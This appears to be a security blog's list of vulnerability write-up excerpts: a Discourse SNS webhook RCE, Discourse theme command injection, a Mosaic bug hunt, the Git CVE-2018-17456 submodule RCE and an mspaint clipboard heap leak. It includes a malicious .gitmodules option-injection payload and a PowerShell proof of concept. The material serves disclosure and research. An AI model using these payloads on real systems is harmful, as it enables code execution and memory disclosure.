Discourse SNS webhook RCE

I was staring at this part of the code for way too long already:

    module Jobs
      class ConfirmSnsSubscription < ::Jobs::Base
        sidekiq_options retry: false

        def execute(args)
          return unless raw = args[:raw].presence
          return unless json = args[:json].presence
          return unless subscribe_url = json["SubscribeURL"].presence

          require "aws-sdk-sns"
          return unless Aws::SNS::MessageVerifier.new.authentic?(raw)

          # confirm subscription by visiting the URL
          open(subscribe_url)
        end
      end
    end

The above code is an excerpt from Discourse’s AWS notification webhook handler. This handler can be triggered without further authentication at https://somedicourseinstance/webhooks/aws.

Discourse themes OS Command Injection

Discourse offers the possibility to install themes from remote Git repositories. Before this commit it was possible to inject OS commands via a maliciously crafted theme pulled via Git. The root cause of the issue lay in the parsing of the .discourse-compatibility file, a YAML file containing a mapping from a target Discourse version to the Git revision to be checked out for that specific Discourse version.

Mosaic “0day”

While attending WarCon in 2016, greg and I sat together in .mario’s talk My Sweet Innocence Exposed - Eleven Reasons why we will all miss you, “e”; his rants about MSIE reminded us that we both still had the task of finding a Mosaic 0day on our agenda. So the evening after the talk we sat down together and started approaching that goal. The latest version of Mosaic for Unix which can be found at ftp://ftp.

CVE-2018-17456

I’ve gotten a couple of questions about exploitation for the recent RCE in Git. So here we go with some technical details.

TL;DR

Here is a PoC repository.

Exploitation

The .gitmodules file looks as follows:

    [submodule "x:x"]
        path = x:x
        url = -u./payload

The actual command being injected is set by the url: -u./payload points the upload-pack flag of git clone to the payload shell script. Note also the : within the path; this part is needed to actually get the payload script executed.

Paintbleed

Summary

mspaint.exe does not properly verify Dib data from the clipboard. Therefore we can craft some Dib data in the clipboard which e.g. suggests a size of 0x100 by 0x100 pixels and contains not more than the Dib header itself. So the actual image data rendered by mspaint.exe is its own heap data =)

PoC

Run the following code in PowerShell:

    $bytes = 40,0,0,0,0,1,0,0,0,1,0,0,1,0,24,0,0,0,0,0,136,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
    [System.Windows.Forms.Clipboard]::SetData([System.Windows.Forms.DataFormats]::Dib,[System.IO.MemoryStream]::new($bytes))

Afterwards open mspaint.exe and paste. The result should be the graphical representation of some of mspaint’s.